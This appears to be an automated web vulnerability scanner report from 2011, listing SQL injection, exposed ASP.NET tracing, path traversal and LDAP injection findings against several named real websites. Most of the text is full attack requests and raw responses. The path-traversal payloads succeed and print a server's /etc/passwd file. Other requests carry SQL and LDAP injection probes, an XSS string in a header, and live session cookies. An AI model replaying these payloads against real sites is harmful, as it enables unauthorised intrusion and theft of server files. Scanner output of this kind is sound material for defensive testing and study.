Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2841/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2841/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:39 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

2. ASP.NET tracing enabled

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:01 GMT
Cache-Control: max-age=10800
Content-Type: text/html; charset=utf-8
Content-Length: 21443
Age: 2
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { font: 10pt verdana, arial; cellspacing:0; cellp
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

3. File path traversal
There are 6 instances of this issue:


3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The background_color parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ffffff../../../../../../../../etc/passwd%00ffffff was submitted in the background_color parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff../../../../../../../../etc/passwd%00ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The city parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Reston../../../../../../../../etc/passwd%00Reston was submitted in the city parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston../../../../../../../../etc/passwd%00Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The country parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload us../../../../../../../../etc/passwd%00us was submitted in the country parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us../../../../../../../../etc/passwd%00us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The font_family parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Verdana../../../../../../../../etc/passwd%00Verdana was submitted in the font_family parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana../../../../../../../../etc/passwd%00Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The state parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Virginia../../../../../../../../etc/passwd%00Virginia was submitted in the state parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia../../../../../../../../etc/passwd%00Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The type parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload js../../../../../../../../etc/passwd%00js was submitted in the type parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js../../../../../../../../etc/passwd%00js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

4. LDAP injection
There are 3 instances of this issue:


4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15355
X-Varnish: 542435617
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>
                   </tr>
               </table>
                       <div class="error_main">
                               <table cellspacing="0" width="100%" class="cbz_header_white" >
                                       <tr>
                                               <td class="cbz_white_header cbz_white_header_left"></td>
                                               <td class="cbz_white_header cbz_white_
...[SNIP]...

Request 2

GET /*)!(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15616
X-Varnish: 542435619
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <li><a href="http://live2.cricbuzz.com/live/scorecard/9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match" onclick="return !loadBalance('9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match', 9935,'menu');">KOL vs MOH
        - KOL won
   </a></li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>

...[SNIP]...

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_search_box.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: 0e0741cd-f638-4e82-af66-b89bdca7d00c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

Request 2

GET /*)!(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
